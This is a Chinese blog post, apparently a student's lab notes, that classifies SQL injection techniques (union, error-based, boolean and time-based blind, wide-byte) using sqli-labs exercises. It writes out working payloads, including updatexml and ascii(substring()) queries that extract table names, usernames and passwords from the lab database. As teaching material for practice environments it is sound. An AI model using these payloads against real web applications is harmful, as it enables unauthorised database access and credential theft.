【实训】SQL注入的分类

最新推荐文章于 2024-07-03 18:17:14 发布
最新推荐文章于 2024-07-03 18:17:14 发布
阅读量145 收藏
点赞数
分类专栏: 网络安全从入门到入门 文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_53223419/article/details/129069244
版权

根据注入模式分类

基于联合查询的注入模式

以sqli-labs第一关为例
首先判断是什么类型的注入
输入?id=1正常,输入?id=1’报错,所以判断为是字符型注入,闭合字符为’

在这里插入图片描述
在这里插入图片描述

判断列数,使用order by命令,末尾输入%23注释掉后面的部分
输入order by = 4报错,输入order by = 3正常,所以判断共有三列

在这里插入图片描述
在这里插入图片描述

判断显示位,使用union联合查询命令,将前面的指令改为假才可以显示出后面指令的结果。
结果显示第二三位是回显字段,可以在第二三位输入指令,结果会在页面上显示

在这里插入图片描述

查看该数据库版本和当前数据库,当前数据库为security,版本为5.5.44

在这里插入图片描述

判断当前数据库用户,结果为root

在这里插入图片描述

查询当前数据库下的所有表

在这里插入图片描述

查看当前数据库下user表中的所有列名

在这里插入图片描述

查看user表中的全部信息

在这里插入图片描述

基于报错的注入模式

以sqli-labs第五关为例
判断注入类型,结果为字符型,闭合字符为’

在这里插入图片描述
在这里插入图片描述

使用updatexml函数查看数据库名

在这里插入图片描述

查询当前数据库下的所有表

在这里插入图片描述

查看当前数据库下user表中的所有列名

在这里插入图片描述

查看user表中的全部信息,但是显示不全

在这里插入图片描述

解决使用updatexml取值显示不全:

方法一: 以less-1为例,使用limit语句限制输出个数,如下图命令意为输出从1个,从第0个开始。
?id=1’and updatexml(1,concat(0x7e,(select username from users limit 0,1),0x7e),1)%23

在这里插入图片描述

方法二: 可以使用mid函数从文本中提取信息,第一个参数是要提取的表名,第二个参数为起始位置,第三个参数为返回的字符个数,可以分段显示查询的字段,直至看到全部字段,如下图分三次查看users表中的全部用户名.

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

基于布尔的盲注

以sqli-labs第八关为例
首先判断闭合字符,在输入’和’)时页面都显示异常且无报错信息,使用逻辑运算符进一步确定闭合字符,结果在使用’且后半句条件为真的基础上页面显示正常,所以闭合字符为’,为字符型注入

在这里插入图片描述

求当前数据库的长度,通过尝试得出长度为8

?id=1'and length(database())=8 -- +

在这里插入图片描述

求当前数据库名,根据结果,对比ASCII码表得出数据库名为security

?id=1'and ascii(substring(database(),1,1))=115 -- +

在这里插入图片描述

?id=1'and ascii(substring(database(),2,1))=101 -- +

在这里插入图片描述

?id=1'and ascii(substring(database(),3,1))=99 -- +

在这里插入图片描述

?id=1'and ascii(substring(database(),4,1))=117 -- +

在这里插入图片描述

?id=1'and ascii(substring(database(),5,1))=114 -- +

在这里插入图片描述

?id=1'and ascii(substring(database(),6,1))=105 -- +

在这里插入图片描述

?id=1'and ascii(substring(database(),7,1))=116 -- +

在这里插入图片描述

?id=1'and ascii(substring(database(),8,1))=121 -- +

在这里插入图片描述

求表的数量结果显示有四个表

?id=1'and (select count(table_name) from information_schema.tables where table_schema='security'limit 0,1) = 4 -- +

在这里插入图片描述

爆表名,结果表名分别为emails,referrers,ugents,users,下图为爆第一个表表名首字母是否为e

?id=1'and ascii(substring((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=101 -- +

在这里插入图片描述

下图为爆第二个表表名首字母为r,修改linmit语句切换数据表

?id=1'and ascii(substring((select table_name from information_schema.tables where table_schema='security' limit 1,1),1,1))=114 -- +

在这里插入图片描述

使用user表报字段名,结果有三个字段分别为id,username,password

?id=1'and ascii(substring((select column_name from information_schema.columns where table_schema='security' and table_name='users'limit 0,1),1,1)) = 105--+

在这里插入图片描述

最后爆库

?id=1'and ascii(substring((select id from users limit 0,1),1,1)) = 49 --+

在这里插入图片描述

?id=1'and ascii(substring((select username from users limit 0,1),1,1)) = 68 --+

在这里插入图片描述

?id=1'and ascii(substring((select password from users limit 0,1),1,1)) = 68 --+

在这里插入图片描述

基于时间的盲注

以sqli-labs第九关为例
尝试四个闭合字符页面都显示正常,考虑使用时间型注入模式
使用’配合sleep()函数构造payload时,发现页面响应时间在设定的5秒左右,即sleep()函数被执行,所以判断出闭合字符为’

在这里插入图片描述

然后使用相同的办法先获取数据库长度,再获取数据库名每一位的ascii值,由此确定数据库名

在这里插入图片描述
在这里插入图片描述

确定数据库名为security后,同样的方法爆数据表的数量

在这里插入图片描述
爆表名

在这里插入图片描述

使用users表爆列名

在这里插入图片描述

最后爆库,注意SQL语句与注释符之间有空格,没有空格会报错

在这里插入图片描述

堆查询的注入模式(目前还未尝试)

宽字节注入

以sqli-labs第三十二关为例
这一关没有输入框需要使用GET或POST方法传参,在使用GET方法输入?id=1’时,报错信息显示在我们输入的原有基础上增加了一个\

在这里插入图片描述

所以将注入的命令变为?id=00%bf’,通过报错信息可以看到闭合字符为’

在这里插入图片描述

这里的命令参考了两位大佬的文章,有不理解的可以做下参考
SQL注入防御绕过——宽字节注入
sqli-labs进阶篇 32关~38关
爆数据库

在这里插入图片描述

爆数据表,由于无法输入’所以无法输入’security’,这里可以使用database()代替当前数据库名称,也可以使用十六进制数表示

在这里插入图片描述

爆users表下列名

在这里插入图片描述

爆库

在这里插入图片描述

如有错误,欢迎批评指正[鞠躬]

夏夏的江江
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入类型
yggcwhat
12-13 2445
SQL注入类型详解 SQL 注入是指web应用程序对用户输入数据控制不严格,导致用户输入数据被拼接到SQL语句中被数据库执行导致的安全问题,按照注入方式可以分为联合注入、布尔盲注、时间盲注、堆叠注入以及报错注入等五种注入方式。在sql注入时影响返回单行的不仅仅是sql 语句的问题,有时是代码层面的问题。 判断注入是否存在 and 1=1,and 1=2 返回页面数据不同 ?id=3-1,返回数据内容不同 添加’、""以及其他特殊符号报错 … 联合注入 前提要求:数据会进行回显,页面有显位符,在一个在一个网
SQL注入分类与详解(转载)
weixin_30878361的博客
08-20 462
SQL注入分类与详解 原文地址:点击跳转 字数统计:11,729 字|阅读时长 ≈47 分钟 对SQL注入的大概分类总结,和一些基础的利用方法。 SQL注入是一种通过操纵输入来修改后台SQL语句以达到利用代码进行攻击的技术。 SQL注入产生的危害很多,比如后台用户及密码泄露、会员用户信息泄露、读写文件,甚至可以获得服务器权限。因此,SQL注入也是OWSP TOP ...
CTF中SQL注入常见题型整理
热门推荐
test
10-10 11万+
前言 正文 无过滤带回显的情况 可能使用到的工具:firefox、hackbar for firfox、sqlmap for linux 手工注入 bugku的环境 在这一环境中的主要是通过post方式传入一个参数id来查询数据库内容。 首先判断sql语句闭合方式 当在id的值后面加上'时,界面无回显,可以判断后端的sql语句应该是 select xxxx from xxxx where...
SQL注入分类
子曰小玖的博客
03-02 2350
**SQL全称是Structured Query Language** 是一种结构化的查询语言,用于与数据库进行交互并能够被数据库解析。SQL注入攻击是一种常见的注入攻击类型。攻击方式在用户与程序进行交互时发生的。如在表单输入、搜索框输入功能中插入SQL命令,然后发送到服务端。服务端对数据进行了解析执行,并执行了一些非预期的操作。 **按照注入点类型来分类** **(1)数字型注...
SQL注入漏洞全接触
05-06
信息安全专业专业实训 网络攻防 SQL注入
数据库实训1
08-08
3. **预处理语句**: 预处理语句能防止SQL注入,提高代码安全性。在PHP中,使用`$mysqli->prepare()`准备SQL语句,然后使用`bind_param()`绑定参数,最后`execute()`执行。 4. **HTML-PhP-Python交互**: 实训中提到...
大学 毕业设计 项目实训 设备管理系统源码(Java).zip
01-15
设备管理系统是许多大学毕业生在完成学业时经常选择的项目实训课题,主要目的是通过实际操作来提升学生的编程技能和软件工程实践能力。这个源码项目基于Java语言开发,涵盖了系统设计、编码、测试等多个环节,是学习...
网页实训
12-29
9. 安全性:学习基本的Web安全知识,包括防止XSS(跨站脚本攻击)、CSRF(跨站请求伪造)和SQL注入等。 10. 测试和调试:学习如何使用浏览器开发者工具进行问题定位和修复,以及编写测试用例来确保代码的质量和功能...
学生实训管理系统.zip
04-02
6. 数据安全与性能优化:系统还考虑了数据安全,如使用预编译的PreparedStatement防止SQL注入,同时通过合理的索引设计和事务管理提高数据库的读写性能,保证系统的稳定运行。 通过这个学生实训管理系统,不仅能够...
SQL注入各类型 讲解及利用 (二)
lendq的Blog
05-07 1988
3. 常见网站架构 我们可以通过常见构架来判断数据库的类型 asp + access asp + mssql asp.net + mssql php + mysql Jsp + oracle Jsp + mysql 具体得到采用什么模型,需要通过扫面工具,或得到的网站默认错误信息等获得. 4. 获取信息,提权 知道某个点存在注入以后,要获得数据库的内容,最直接的办法是...
SQL注入分类、防御
BeatRex的博客
06-13 3240
一、SQL注入分类 按数据类型分 数字类型 后台语句可能为: $id=$_POST['id'] select user,password from users where id=$id 字符类型 $id=$_POST['id'] 后台语句可能为:select user,password from users where id='$id' 总结: 数字类型直接将后台接收到用户输入的内容带入到数...
LeetCode //SQL - 196. Delete Duplicate Emails
Made in Code
07-03 930
【代码】LeetCode //SQL - 196. Delete Duplicate Emails。
postgresql日志的配置
weixin_44847119的博客
07-03 1088
postgresql日志的配置。
My sql 安装,环境搭建
2201_75643669的博客
07-03 542
以下以MySQL 8.0.36为例。
解决数据库PGSQL,在Mybatis中创建临时表报错TODO IDENTIFIER,连接池用的Druid。更换最新版本Druid仍然报错解决
番茄Salad
07-02 209
然后我找到了Druid的配置,把全部配置都注释掉,居然可以成功的执行了。然后我一个一个配置排查发现,有个filters的配置,引起的报错,只要把这个注释了,就能成功执行,不管切换什么版本的Druid。我在navicat中尝试了一下执行相同的sql创建临时表语句,确实是能执行的。然后我又进行了一次测试,在xml中的sql创建临时表语句把TEMPORARY删除,直接创建一张物理表,确实成功的执行了。在网上搜索了一下,说把Druid版本升级到最新,我试着升级到了最新,确实不报这个错误了,又报了一个新的错误。
创建数据库表的语法定义包含了SQL Server、Mysql、PostgreSQLSQLite的示例
weixin_49816293的博客
07-03 750
数据库设计中,创建表是基础且关键的一步。本文将详细介绍如何在不同数据库系统中使用数据定义语言(DDL)来定义表结构。
SQL-DQL
最新发布
qq_59076775的博客
07-03 442
X表示前面有多少位无所谓,最后一位为X。五.DQL-聚合函数将一列数据作为一个整体,进行纵向计算。
# Sharding-JDBC从入门到精通(6)-- Sharding-JDBC 水平分库 和 垂直分库。
段子手168的博客
07-02 1446
# Sharding-JDBC从入门到精通(6)- Sharding-JDBC 水平分库 和 垂直分库。 01-Sharding-JDBC水平分库-分片策略配置 02-Sharding-JDBC水平分库-插入订单 03-Sharding-JDBC水平分库-查询订单 04-Sharding-JDBC垂直分库-分片策略配置 05-Sharding-JDBC垂直分库-插入和查询测试
java实训连接数据库实训结论
05-23
连接数据库是Java实训中的一个非常重要的环节,通常需要使用JDBC API来完成。在连接数据库之前,需要先下载并安装相应的数据库驱动程序(如MySQL JDBC驱动)。 连接数据库的过程需要进行以下几个步骤: 1. 加载...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值